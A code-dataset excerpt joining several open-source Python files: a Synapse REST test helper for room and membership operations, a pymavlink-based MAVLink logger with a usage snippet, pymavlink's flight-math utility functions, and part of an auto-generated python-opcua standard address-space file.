self.auth_user_id = None
def mock_get_user_by_token(self, token=None):
return self.auth_user_id
@defer.inlineCallbacks
def create_room_as(self, room_creator, is_public=True, tok=None):
temp_id = self.auth_user_id
self.auth_user_id = room_creator
path = "/createRoom"
content = "{}"
if not is_public:
content = '{"visibility":"private"}'
if tok:
path = path + "?access_token=%s" % tok
(code, response) = yield self.mock_resource.trigger("POST", path, content)
self.assertEquals(200, code, msg=str(response))
self.auth_user_id = temp_id
defer.returnValue(response["room_id"])
@defer.inlineCallbacks
def invite(self, room=None, src=None, targ=None, expect_code=200, tok=None):
yield self.change_membership(room=room, src=src, targ=targ, tok=tok,
membership=Membership.INVITE,
expect_code=expect_code)
@defer.inlineCallbacks
def join(self, room=None, user=None, expect_code=200, tok=None):
yield self.change_membership(room=room, src=user, targ=user, tok=tok,
membership=Membership.JOIN,
expect_code=expect_code)
@defer.inlineCallbacks
def leave(self, room=None, user=None, expect_code=200, tok=None):
yield self.change_membership(room=room, src=user, targ=user, tok=tok,
membership=Membership.LEAVE,
expect_code=expect_code)
@defer.inlineCallbacks
def change_membership(self, room, src, targ, membership, tok=None,
expect_code=200):
temp_id = self.auth_user_id
self.auth_user_id = src
path = "/rooms/%s/state/m.room.member/%s" % (room, targ)
if tok:
path = path + "?access_token=%s" % tok
data = {
"membership": membership
}
(code, response) = yield self.mock_resource.trigger("PUT", path,
json.dumps(data))
self.assertEquals(expect_code, code, msg=str(response))
self.auth_user_id = temp_id
@defer.inlineCallbacks
def register(self, user_id):
(code, response) = yield self.mock_resource.trigger(
"POST",
"/register",
json.dumps({
"user": user_id,
"password": "test",
"type": "m.login.password"
}))
self.assertEquals(200, code)
defer.returnValue(response)
@defer.inlineCallbacks
def send(self, room_id, body=None, txn_id=None, tok=None,
expect_code=200):
if txn_id is None:
txn_id = "m%s" % (str(time.time()))
if body is None:
body = "body_text_here"
path = "/rooms/%s/send/m.room.message/%s" % (room_id, txn_id)
content = '{"msgtype":"m.text","body":"%s"}' % body
if tok:
path = path + "?access_token=%s" % tok
(code, response) = yield self.mock_resource.trigger("PUT", path, content)
self.assertEquals(expect_code, code, msg=str(response))
def assert_dict(self, required, actual):
"""Does a partial assert of a dict.
Args:
required (dict): The keys and value which MUST be in 'actual'.
actual (dict): The test result. Extra keys will not be checked.
"""
for key in required:
self.assertEquals(required[key], actual[key],
msg="%s mismatch. %s" % (key, actual))
|
rzr/synapse
|
tests/rest/client/v1/utils.py
|
Python
|
apache-2.0
| 4,828
| 0.000829
|
"""Log MAVLink stream."""
import argparse
from pymavlink import mavutil
import pymavlink.dialects.v10.ceaufmg as mavlink
def main():
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument("--verbose", action='store_true',
help="print messages to STDOUT")
parser.add_argument("--device", required=True, help="serial port")
parser.add_argument("--log", type=argparse.FileType('w'),
help="Log file")
parser.add_argument("--baudrate", type=int, help="serial port baud rate",
default=57600)
args = parser.parse_args()
conn = mavutil.mavlink_connection(args.device, baud=args.baudrate)
conn.logfile = args.log
while True:
msg = conn.recv_msg()
if args.verbose and msg is not None:
print(msg)
if __name__ == '__main__':
main()
|
cea-ufmg/pyfdas
|
pyfdas/mavlog.py
|
Python
|
mit
| 891
| 0.001122
|
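# Equivalent interactive use of the same pymavlink primitives as mavlog.py
# above; the device path, baud rate and log file name are placeholders for
# whatever serial adapter is actually attached:
from pymavlink import mavutil
conn = mavutil.mavlink_connection('/dev/ttyUSB0', baud=57600)
conn.logfile = open('flight.log', 'wb')  # raw stream is logged as messages arrive
msg = conn.recv_match(type='HEARTBEAT', blocking=True, timeout=5)
print(msg)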
#!/usr/bin/env python
'''
useful extra functions for use by mavlink clients
Copyright Andrew Tridgell 2011
Released under GNU GPL version 3 or later
'''
import os, sys
from math import *
sys.path.insert(0, os.path.join(os.path.dirname(os.path.realpath(__file__)), 'examples'))
try:
# rotmat doesn't work on Python3.2 yet
from rotmat import Vector3, Matrix3
except Exception:
pass
def kmh(mps):
'''convert m/s to Km/h'''
return mps*3.6
def altitude(SCALED_PRESSURE, ground_pressure=None, ground_temp=None):
'''calculate barometric altitude'''
import mavutil
self = mavutil.mavfile_global
if ground_pressure is None:
if self.param('GND_ABS_PRESS', None) is None:
return 0
ground_pressure = self.param('GND_ABS_PRESS', 1)
if ground_temp is None:
ground_temp = self.param('GND_TEMP', 0)
scaling = ground_pressure / (SCALED_PRESSURE.press_abs*100.0)
temp = ground_temp + 273.15
return log(scaling) * temp * 29271.267 * 0.001
def mag_heading(RAW_IMU, ATTITUDE, declination=None, SENSOR_OFFSETS=None, ofs=None):
'''calculate heading from raw magnetometer'''
if declination is None:
import mavutil
declination = degrees(mavutil.mavfile_global.param('COMPASS_DEC', 0))
mag_x = RAW_IMU.xmag
mag_y = RAW_IMU.ymag
mag_z = RAW_IMU.zmag
if SENSOR_OFFSETS is not None and ofs is not None:
mag_x += ofs[0] - SENSOR_OFFSETS.mag_ofs_x
mag_y += ofs[1] - SENSOR_OFFSETS.mag_ofs_y
mag_z += ofs[2] - SENSOR_OFFSETS.mag_ofs_z
headX = mag_x*cos(ATTITUDE.pitch) + mag_y*sin(ATTITUDE.roll)*sin(ATTITUDE.pitch) + mag_z*cos(ATTITUDE.roll)*sin(ATTITUDE.pitch)
headY = mag_y*cos(ATTITUDE.roll) - mag_z*sin(ATTITUDE.roll)
heading = degrees(atan2(-headY,headX)) + declination
if heading < 0:
heading += 360
return heading
def mag_field(RAW_IMU, SENSOR_OFFSETS=None, ofs=None):
'''calculate magnetic field strength from raw magnetometer'''
mag_x = RAW_IMU.xmag
mag_y = RAW_IMU.ymag
mag_z = RAW_IMU.zmag
if SENSOR_OFFSETS is not None and ofs is not None:
mag_x += ofs[0] - SENSOR_OFFSETS.mag_ofs_x
mag_y += ofs[1] - SENSOR_OFFSETS.mag_ofs_y
mag_z += ofs[2] - SENSOR_OFFSETS.mag_ofs_z
return sqrt(mag_x**2 + mag_y**2 + mag_z**2)
def angle_diff(angle1, angle2):
'''show the difference between two angles in degrees'''
ret = angle1 - angle2
if ret > 180:
        ret -= 360
if ret < -180:
ret += 360
return ret
average_data = {}
def average(var, key, N):
'''average over N points'''
global average_data
if not key in average_data:
average_data[key] = [var]*N
return var
average_data[key].pop(0)
average_data[key].append(var)
return sum(average_data[key])/N
derivative_data = {}
def second_derivative_5(var, key):
'''5 point 2nd derivative'''
global derivative_data
import mavutil
tnow = mavutil.mavfile_global.timestamp
if not key in derivative_data:
derivative_data[key] = (tnow, [var]*5)
return 0
(last_time, data) = derivative_data[key]
data.pop(0)
data.append(var)
derivative_data[key] = (tnow, data)
h = (tnow - last_time)
# N=5 2nd derivative from
# http://www.holoborodko.com/pavel/numerical-methods/numerical-derivative/smooth-low-noise-differentiators/
ret = ((data[4] + data[0]) - 2*data[2]) / (4*h**2)
return ret
def second_derivative_9(var, key):
'''9 point 2nd derivative'''
global derivative_data
import mavutil
tnow = mavutil.mavfile_global.timestamp
if not key in derivative_data:
derivative_data[key] = (tnow, [var]*9)
return 0
(last_time, data) = derivative_data[key]
data.pop(0)
data.append(var)
derivative_data[key] = (tnow, data)
h = (tnow - last_time)
    # N=9 2nd derivative from
# http://www.holoborodko.com/pavel/numerical-methods/numerical-derivative/smooth-low-noise-differentiators/
f = data
ret = ((f[8] + f[0]) + 4*(f[7] + f[1]) + 4*(f[6]+f[2]) - 4*(f[5]+f[3]) - 10*f[4])/(64*h**2)
return ret
lowpass_data = {}
def lowpass(var, key, factor):
'''a simple lowpass filter'''
global lowpass_data
if not key in lowpass_data:
lowpass_data[key] = var
else:
lowpass_data[key] = factor*lowpass_data[key] + (1.0 - factor)*var
return lowpass_data[key]
last_diff = {}
def diff(var, key):
'''calculate differences between values'''
global last_diff
ret = 0
if not key in last_diff:
last_diff[key] = var
return 0
ret = var - last_diff[key]
last_diff[key] = var
return ret
last_delta = {}
def delta(var, key, tusec=None):
'''calculate slope'''
global last_delta
if tusec is not None:
tnow = tusec * 1.0e-6
else:
import mavutil
tnow = mavutil.mavfile_global.timestamp
dv = 0
ret = 0
if key in last_delta:
(last_v, last_t, last_ret) = last_delta[key]
if last_t == tnow:
return last_ret
        if tnow == last_t:
            ret = 0
        else:
            ret = (var - last_v) / (tnow - last_t)
last_delta[key] = (var, tnow, ret)
return ret
def delta_angle(var, key, tusec=None):
'''calculate slope of an angle'''
global last_delta
if tusec is not None:
tnow = tusec * 1.0e-6
else:
import mavutil
tnow = mavutil.mavfile_global.timestamp
dv = 0
ret = 0
if key in last_delta:
(last_v, last_t, last_ret) = last_delta[key]
if last_t == tnow:
return last_ret
        if tnow == last_t:
            ret = 0
        else:
            dv = var - last_v
            if dv > 180:
                dv -= 360
            if dv < -180:
                dv += 360
            ret = dv / (tnow - last_t)
last_delta[key] = (var, tnow, ret)
return ret
def roll_estimate(RAW_IMU,GPS_RAW_INT=None,ATTITUDE=None,SENSOR_OFFSETS=None, ofs=None, mul=None,smooth=0.7):
'''estimate roll from accelerometer'''
rx = RAW_IMU.xacc * 9.81 / 1000.0
ry = RAW_IMU.yacc * 9.81 / 1000.0
rz = RAW_IMU.zacc * 9.81 / 1000.0
if ATTITUDE is not None and GPS_RAW_INT is not None:
ry -= ATTITUDE.yawspeed * GPS_RAW_INT.vel*0.01
rz += ATTITUDE.pitchspeed * GPS_RAW_INT.vel*0.01
if SENSOR_OFFSETS is not None and ofs is not None:
rx += SENSOR_OFFSETS.accel_cal_x
ry += SENSOR_OFFSETS.accel_cal_y
rz += SENSOR_OFFSETS.accel_cal_z
rx -= ofs[0]
ry -= ofs[1]
rz -= ofs[2]
if mul is not None:
rx *= mul[0]
ry *= mul[1]
rz *= mul[2]
return lowpass(degrees(-asin(ry/sqrt(rx**2+ry**2+rz**2))),'_roll',smooth)
def pitch_estimate(RAW_IMU, GPS_RAW_INT=None,ATTITUDE=None, SENSOR_OFFSETS=None, ofs=None, mul=None, smooth=0.7):
'''estimate pitch from accelerometer'''
rx = RAW_IMU.xacc * 9.81 / 1000.0
ry = RAW_IMU.yacc * 9.81 / 1000.0
rz = RAW_IMU.zacc * 9.81 / 1000.0
if ATTITUDE is not None and GPS_RAW_INT is not None:
ry -= ATTITUDE.yawspeed * GPS_RAW_INT.vel*0.01
rz += ATTITUDE.pitchspeed * GPS_RAW_INT.vel*0.01
if SENSOR_OFFSETS is not None and ofs is not None:
rx += SENSOR_OFFSETS.accel_cal_x
ry += SENSOR_OFFSETS.accel_cal_y
rz += SENSOR_OFFSETS.accel_cal_z
rx -= ofs[0]
ry -= ofs[1]
rz -= ofs[2]
if mul is not None:
rx *= mul[0]
ry *= mul[1]
rz *= mul[2]
return lowpass(degrees(asin(rx/sqrt(rx**2+ry**2+rz**2))),'_pitch',smooth)
def rotation(ATTITUDE):
'''return the current DCM rotation matrix'''
r = Matrix3()
r.from_euler(ATTITUDE.roll, ATTITUDE.pitch, ATTITUDE.yaw)
return r
def mag_rotation(RAW_IMU, inclination, declination):
'''return an attitude rotation matrix that is consistent with the current mag
vector'''
m_body = Vector3(RAW_IMU.xmag, RAW_IMU.ymag, RAW_IMU.zmag)
m_earth = Vector3(m_body.length(), 0, 0)
r = Matrix3()
r.from_euler(0, -radians(inclination), radians(declination))
m_earth = r * m_earth
r.from_two_vectors(m_earth, m_body)
return r
def mag_yaw(RAW_IMU, inclination, declination):
'''estimate yaw from mag'''
m = mag_rotation(RAW_IMU, inclination, declination)
(r, p, y) = m.to_euler()
y = degrees(y)
if y < 0:
y += 360
return y
def mag_pitch(RAW_IMU, inclination, declination):
    '''estimate pitch from mag'''
m = mag_rotation(RAW_IMU, inclination, declination)
(r, p, y) = m.to_euler()
return degrees(p)
def mag_roll(RAW_IMU, inclination, declination):
'''estimate roll from mag'''
m = mag_rotation(RAW_IMU, inclination, declination)
(r, p, y) = m.to_euler()
return degrees(r)
def expected_mag(RAW_IMU, ATTITUDE, inclination, declination):
'''return expected mag vector'''
m_body = Vector3(RAW_IMU.xmag, RAW_IMU.ymag, RAW_IMU.zmag)
field_strength = m_body.length()
m = rotation(ATTITUDE)
r = Matrix3()
r.from_euler(0, -radians(inclination), radians(declination))
m_earth = r * Vector3(field_strength, 0, 0)
return m.transposed() * m_earth
def mag_discrepancy(RAW_IMU, ATTITUDE, inclination, declination=None):
'''give the magnitude of the discrepancy between observed and expected magnetic field'''
if declination is None:
import mavutil
declination = degrees(mavutil.mavfile_global.param('COMPASS_DEC', 0))
expected = expected_mag(RAW_IMU, ATTITUDE, inclination, declination)
mag = Vector3(RAW_IMU.xmag, RAW_IMU.ymag, RAW_IMU.zmag)
return degrees(expected.angle(mag))
def mag_inclination(RAW_IMU, ATTITUDE, declination=None):
    '''estimate the magnetic field inclination (dip angle) from the mag vector and attitude'''
if declination is None:
import mavutil
declination = degrees(mavutil.mavfile_global.param('COMPASS_DEC', 0))
r = rotation(ATTITUDE)
mag1 = Vector3(RAW_IMU.xmag, RAW_IMU.ymag, RAW_IMU.zmag)
mag1 = r * mag1
mag2 = Vector3(cos(radians(declination)), sin(radians(declination)), 0)
inclination = degrees(mag1.angle(mag2))
if RAW_IMU.zmag < 0:
inclination = -inclination
return inclination
def expected_magx(RAW_IMU, ATTITUDE, inclination, declination):
'''estimate from mag'''
v = expected_mag(RAW_IMU, ATTITUDE, inclination, declination)
return v.x
def expected_magy(RAW_IMU, ATTITUDE, inclination, declination):
'''estimate from mag'''
v = expected_mag(RAW_IMU, ATTITUDE, inclination, declination)
return v.y
def expected_magz(RAW_IMU, ATTITUDE, inclination, declination):
'''estimate from mag'''
v = expected_mag(RAW_IMU, ATTITUDE, inclination, declination)
return v.z
def gravity(RAW_IMU, SENSOR_OFFSETS=None, ofs=None, mul=None, smooth=0.7):
    '''estimate the magnitude of gravity (total acceleration) from the accelerometer'''
rx = RAW_IMU.xacc * 9.81 / 1000.0
ry = RAW_IMU.yacc * 9.81 / 1000.0
rz = RAW_IMU.zacc * 9.81 / 1000.0
if SENSOR_OFFSETS is not None and ofs is not None:
rx += SENSOR_OFFSETS.accel_cal_x
ry += SENSOR_OFFSETS.accel_cal_y
rz += SENSOR_OFFSETS.accel_cal_z
rx -= ofs[0]
ry -= ofs[1]
rz -= ofs[2]
if mul is not None:
rx *= mul[0]
ry *= mul[1]
rz *= mul[2]
return lowpass(sqrt(rx**2+ry**2+rz**2),'_gravity',smooth)
def pitch_sim(SIMSTATE, GPS_RAW):
'''estimate pitch from SIMSTATE accels'''
xacc = SIMSTATE.xacc - lowpass(delta(GPS_RAW.v,"v")*6.6, "v", 0.9)
zacc = SIMSTATE.zacc
    zacc += SIMSTATE.ygyro * GPS_RAW.v
if xacc/zacc >= 1:
return 0
if xacc/zacc <= -1:
return -0
return degrees(-asin(xacc/zacc))
def distance_two(GPS_RAW1, GPS_RAW2):
'''distance between two points'''
if hasattr(GPS_RAW1, 'cog'):
lat1 = radians(GPS_RAW1.lat)*1.0e-7
lat2 = radians(GPS_RAW2.lat)*1.0e-7
lon1 = radians(GPS_RAW1.lon)*1.0e-7
lon2 = radians(GPS_RAW2.lon)*1.0e-7
else:
lat1 = radians(GPS_RAW1.lat)
lat2 = radians(GPS_RAW2.lat)
lon1 = radians(GPS_RAW1.lon)
lon2 = radians(GPS_RAW2.lon)
dLat = lat2 - lat1
dLon = lon2 - lon1
a = sin(0.5*dLat)**2 + sin(0.5*dLon)**2 * cos(lat1) * cos(lat2)
c = 2.0 * atan2(sqrt(a), sqrt(1.0-a))
return 6371 * 1000 * c
first_fix = None
def distance_home(GPS_RAW):
'''distance from first fix point'''
global first_fix
if GPS_RAW.fix_type < 2:
return 0
    if first_fix is None or first_fix.fix_type < 2:
first_fix = GPS_RAW
return 0
return distance_two(GPS_RAW, first_fix)
def sawtooth(ATTITUDE, amplitude=2.0, period=5.0):
'''sawtooth pattern based on uptime'''
mins = (ATTITUDE.usec * 1.0e-6)/60
p = fmod(mins, period*2)
if p < period:
return amplitude * (p/period)
return amplitude * (period - (p-period))/period
def rate_of_turn(speed, bank):
'''return expected rate of turn in degrees/s for given speed in m/s and
bank angle in degrees'''
if abs(speed) < 2 or abs(bank) > 80:
return 0
ret = degrees(9.81*tan(radians(bank))/speed)
return ret
def wingloading(bank):
'''return expected wing loading factor for a bank angle in radians'''
return 1.0/cos(bank)
def airspeed(VFR_HUD, ratio=None):
'''recompute airspeed with a different ARSPD_RATIO'''
import mavutil
mav = mavutil.mavfile_global
if ratio is None:
ratio = 1.98 # APM default
if 'ARSPD_RATIO' in mav.params:
used_ratio = mav.params['ARSPD_RATIO']
else:
used_ratio = ratio
airspeed_pressure = (VFR_HUD.airspeed**2) / used_ratio
airspeed = sqrt(airspeed_pressure * ratio)
return airspeed
def earth_rates(ATTITUDE):
'''return angular velocities in earth frame'''
from math import sin, cos, tan, fabs
p = ATTITUDE.rollspeed
q = ATTITUDE.pitchspeed
r = ATTITUDE.yawspeed
phi = ATTITUDE.roll
theta = ATTITUDE.pitch
psi = ATTITUDE.yaw
phiDot = p + tan(theta)*(q*sin(phi) + r*cos(phi))
thetaDot = q*cos(phi) - r*sin(phi)
if fabs(cos(theta)) < 1.0e-20:
theta += 1.0e-10
psiDot = (q*sin(phi) + r*cos(phi))/cos(theta)
return (phiDot, thetaDot, psiDot)
def roll_rate(ATTITUDE):
'''return roll rate in earth frame'''
(phiDot, thetaDot, psiDot) = earth_rates(ATTITUDE)
return phiDot
def pitch_rate(ATTITUDE):
'''return pitch rate in earth frame'''
(phiDot, thetaDot, psiDot) = earth_rates(ATTITUDE)
return thetaDot
def yaw_rate(ATTITUDE):
'''return yaw rate in earth frame'''
(phiDot, thetaDot, psiDot) = earth_rates(ATTITUDE)
return psiDot
def gps_velocity(GPS_RAW_INT):
'''return GPS velocity vector'''
return Vector3(GPS_RAW_INT.vel*0.01*cos(radians(GPS_RAW_INT.cog*0.01)),
GPS_RAW_INT.vel*0.01*sin(radians(GPS_RAW_INT.cog*0.01)), 0)
def gps_velocity_body(GPS_RAW_INT, ATTITUDE):
'''return GPS velocity vector in body frame'''
r = rotation(ATTITUDE)
return r.transposed() * Vector3(GPS_RAW_INT.vel*0.01*cos(radians(GPS_RAW_INT.cog*0.01)),
GPS_RAW_INT.vel*0.01*sin(radians(GPS_RAW_INT.cog*0.01)),
-tan(ATTITUDE.pitch)*GPS_RAW_INT.vel*0.01)
def earth_accel(RAW_IMU,ATTITUDE):
'''return earth frame acceleration vector'''
r = rotation(ATTITUDE)
accel = Vector3(RAW_IMU.xacc, RAW_IMU.yacc, RAW_IMU.zacc) * 9.81 * 0.001
return r * accel
def earth_gyro(RAW_IMU,ATTITUDE):
'''return earth frame gyro vector'''
r = rotation(ATTITUDE)
accel = Vector3(degrees(RAW_IMU.xgyro), degrees(RAW_IMU.ygyro), degrees(RAW_IMU.zgyro)) * 0.001
return r * accel
def airspeed_energy_error(NAV_CONTROLLER_OUTPUT, VFR_HUD):
'''return airspeed energy error matching APM internals
This is positive when we are going too slow
'''
aspeed_cm = VFR_HUD.airspeed*100
target_airspeed = NAV_CONTROLLER_OUTPUT.aspd_error + aspeed_cm
airspeed_energy_error = ((target_airspeed*target_airspeed) - (aspeed_cm*aspeed_cm))*0.00005
return airspeed_energy_error
def energy_error(NAV_CONTROLLER_OUTPUT, VFR_HUD):
'''return energy error matching APM internals
This is positive when we are too low or going too slow
'''
aspeed_energy_error = airspeed_energy_error(NAV_CONTROLLER_OUTPUT, VFR_HUD)
alt_error = NAV_CONTROLLER_OUTPUT.alt_error*100
energy_error = aspeed_energy_error + alt_error*0.098
return energy_error
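# A quick numerical check of two of the pure-math helpers above (standard
# coordinated-turn relations, no MAVLink connection needed): at 25 m/s with a
# 30 degree bank, rate_of_turn() gives about 13 deg/s and wingloading() about
# 1.15 g.
assert abs(rate_of_turn(25.0, 30.0) - 12.98) < 0.01
assert abs(wingloading(radians(30.0)) - 1.1547) < 0.001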
|
trunetcopter/trunetcopter
|
gui/pymavlink/mavextra.py
|
Python
|
gpl-3.0
| 16,655
| 0.005344
|
# -*- coding: utf-8 -*-
"""
DO NOT EDIT THIS FILE!
It is automatically generated from opcfoundation.org schemas.
"""
from opcua import ua
from opcua.ua import NodeId, QualifiedName, NumericNodeId, StringNodeId, GuidNodeId
from opcua.ua import NodeClass, LocalizedText
def create_standard_address_space_Part11(server):
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(56, 0)
node.BrowseName = QualifiedName('HasHistoricalConfiguration', 0)
node.NodeClass = NodeClass.ReferenceType
node.ParentNodeId = NumericNodeId(44, 0)
node.ReferenceTypeId = NumericNodeId(45, 0)
attrs = ua.ReferenceTypeAttributes()
attrs.Description = LocalizedText("The type for a reference to the historical configuration for a data variable.")
attrs.DisplayName = LocalizedText("HasHistoricalConfiguration")
attrs.InverseName = LocalizedText("HistoricalConfigurationOf")
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(45, 0)
ref.SourceNodeId = NumericNodeId(56, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(44, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11192, 0)
node.BrowseName = QualifiedName('HistoryServerCapabilities', 0)
node.NodeClass = NodeClass.Object
node.ParentNodeId = NumericNodeId(2268, 0)
node.ReferenceTypeId = NumericNodeId(47, 0)
node.TypeDefinition = NumericNodeId(2330, 0)
attrs = ua.ObjectAttributes()
attrs.DisplayName = LocalizedText("HistoryServerCapabilities")
attrs.EventNotifier = 0
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11192, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11193, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11192, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11242, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11192, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11273, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11192, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11274, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11192, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11196, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11192, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11197, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11192, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11198, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11192, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11199, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11192, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11200, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11192, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11281, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11192, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11282, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11192, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11283, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11192, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11502, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11192, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11275, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(47, 0)
ref.SourceNodeId = NumericNodeId(11192, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11201, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(47, 0)
ref.SourceNodeId = NumericNodeId(11192, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2268, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11192, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2330, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11193, 0)
node.BrowseName = QualifiedName('AccessHistoryDataCapability', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(11192, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("AccessHistoryDataCapability")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11193, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11193, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11192, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11242, 0)
node.BrowseName = QualifiedName('AccessHistoryEventsCapability', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(11192, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("AccessHistoryEventsCapability")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11242, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11242, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11192, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11273, 0)
node.BrowseName = QualifiedName('MaxReturnDataValues', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(11192, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("MaxReturnDataValues")
attrs.DataType = ua.NodeId(ua.ObjectIds.UInt32)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11273, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11273, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11192, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11274, 0)
